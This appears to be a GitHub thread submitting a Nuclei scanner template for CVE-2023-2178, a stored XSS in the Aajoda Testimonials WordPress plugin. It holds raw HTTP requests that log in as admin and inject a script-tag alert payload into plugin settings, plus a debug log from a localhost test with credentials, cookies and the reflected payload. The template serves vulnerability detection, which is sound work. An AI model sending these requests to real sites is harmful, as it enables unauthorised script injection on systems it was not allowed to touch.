[nuclei-template]

[muhamedfarish]

Template Information:

• CVE-2023-2178

• Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS

• Description:The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

• Reference: https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb

Nuclei Template:

`id: CVE-2023-2178 info: name: Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS author: Farish severity: Medium description: | The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). reference:

• https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
  classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cwe-id: CWE-79 metadata: max-request: 2 verified: true tags: wpscan,cwe-79,stored xss,wordpress,CVE-2023-2178

http:

• raw:

  • | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

    log={{username}}&pwd={{password}}&wp-submit=Log+In

  • | POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1 Host: {{Hostname}}

    aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Ftemplate+by+farish%2F%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save

  cookie-reuse: true matchers:

  • type: dsl dsl:
    • 'status_code_2 == 200'
    • 'contains(all_headers_2, "text/html")'
    • 'contains(body_2, ""></textarea><script>alert(/template by farish/)</script>")' condition: and

` Debug result:

POST /wp-login.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close Content-Length: 40 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip

log=admin&pwd=admin@123&wp-submit=Log+In [DBG] [CVE-2023-2178] Dumped HTTP response http://localhost:8080/wp-login.php

HTTP/1.1 302 Found Connection: close Content-Length: 0 Cache-Control: no-cache, must-revalidate, max-age=0 Content-Type: text/html; charset=UTF-8 Date: Mon, 24 Jul 2023 08:08:48 GMT Expires: Wed, 11 Jan 1984 05:00:00 GMT Location: http://localhost:8080/wp-admin/ Pragma: no-cache Server: Apache/2.4.56 (Debian) Set-Cookie: PHPSESSID=f3e5187bd6faf7ec1b01386487f5e308; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/ Set-Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7Ccee2c44af0f4f9c3db2abeebdfb2734f07416c231ca99c8437098e71c8d3e722; path=/wp-content/plugins; HttpOnly Set-Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7Ccee2c44af0f4f9c3db2abeebdfb2734f07416c231ca99c8437098e71c8d3e722; path=/wp-admin; HttpOnly Set-Cookie: wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7C0d16602903b5aa8f7671467f5981a4c74cb367edadf9b2fda02cebdf87f2de43; path=/; HttpOnly X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/8.0.29 X-Redirect-By: WordPress

[INF] [CVE-2023-2178] Dumped HTTP request for http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials

POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Connection: close Content-Length: 192 Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7Ccee2c44af0f4f9c3db2abeebdfb2734f07416c231ca99c8437098e71c8d3e722; PHPSESSID=f3e5187bd6faf7ec1b01386487f5e308; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7C0d16602903b5aa8f7671467f5981a4c74cb367edadf9b2fda02cebdf87f2de43 Accept-Encoding: gzip

aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Ftemplate+by+farish%2F%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save [DBG] [CVE-2023-2178] Dumped HTTP response http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials

HTTP/1.1 200 OK Connection: close Cache-Control: no-cache, must-revalidate, max-age=0 Content-Type: text/html; charset=UTF-8 Date: Mon, 24 Jul 2023 08:08:49 GMT Expires: Wed, 11 Jan 1984 05:00:00 GMT Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Server: Apache/2.4.56 (Debian) Set-Cookie: wp-settings-1=libraryContent%3Dbrowse; expires=Tue, 23-Jul-2024 08:08:49 GMT; Max-Age=31536000; path=/ Set-Cookie: wp-settings-time-1=1690186129; expires=Tue, 23-Jul-2024 08:08:49 GMT; Max-Age=31536000; path=/ Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/8.0.29

<!DOCTYPE html> <html class="wp-toolbar" lang="en-US">

Skip to main content Skip to toolbar

• 
  
  Dashboard
  • Dashboard
  • Home
  • Updates 7
• 
  
  Posts
  • Posts
  • All Posts
  • Add New
  • Categories
  • Tags
• 
  
  Media
  • Media
  • Library
  • Add New
• 
  
  Pages
  • Pages
  • All Pages
  • Add New
• 
  
  Comments 00 Comments in moderation
• 
  
  Tickets
  • Tickets
  • All Tickets
  • Add New
  • Tags
  • Channels
  • Settings
  • Tools
  • Addons
  • Get a Free Addon!
  • Help & Support
  • About
• 
  
  Pets
  • Pets
  • All Pets
  • Add New
  • Breed
  • Colors
  • Sponsors
  • Locations
  • Settings
  • Fields
  • Upgrade  ➤
• 
  
  Appearance
  • Appearance
  • Themes 0
  • Editor
  • Customize
• 
  
  Plugins 7
  • Plugins 7
  • Installed Plugins
  • Add New
• 
  
  Users
  • Users
  • All Users
  • Add New
  • Profile
• 
  
  Tools
  • Tools
  • Available Tools
  • Import
  • Export
  • Site Health 0
  • Export Personal Data
  • Erase Personal Data
  • Sitemap
  • Theme File Editor
  • Plugin File Editor
• 
  
  Settings
  • Settings
  • General
  • Writing
  • Reading
  • Discussion
  • Media
  • Permalinks
  • Privacy
• 
  
  404 to 301
  • 404 to 301
  • 404 Error Logs
  • 404 Settings
• 
  Aajoda
• Collapse menu

• Menu
• About WordPress
  • About WordPress

  • WordPress.org
  • Documentation
  • Support
  • Feedback
• admin
  • Visit Site
• 77 updates available
• 00 Comments in moderation
• New
  • Post
  • Media
  • Page
  • Ticket
  • Pets
  • User
• 0

• Howdy, admin
  • admin
  • Edit Profile
  • Log Out

Log Out

Awesome Support: First Time Install

Thank you for installing Awesome Support. Please choose an option below to get started.

If this is not the first time you are using Awesome Support or you would like to manually configure your initial settings, then you should choose to skip this process. Otherwise proceed by clicking the orange button.

Click here To Get Started Now Or skip this process

Aajoda Testimonials Options

Aajoda WP Shortcodes

Fetch your Aajoda WP shortcode from aajoda.com and paste it in any post or page in your website like this:

[aajoda id="xxxxxxxxx"]

Select version

2.0 2.1 (beta)

Optional Aajoda Style

Place optional css style for Aajoda in this textarea below

"></textarea><script>alert(/template by farish/)</script>

Version 6.2.2

Close dialog

Session expired

Please log in again. The login page will open in a new tab. After logging in you can close it and return to this page.

[CVE-2023-2178:dsl-1] [http] [medium] http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials

[muhamedfarish]

when you approve this template?

[DhiyaneshGeek]

Hi @muhamedfarish , thank you so much for sharing this template with the community and contributing to this project 🍻

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again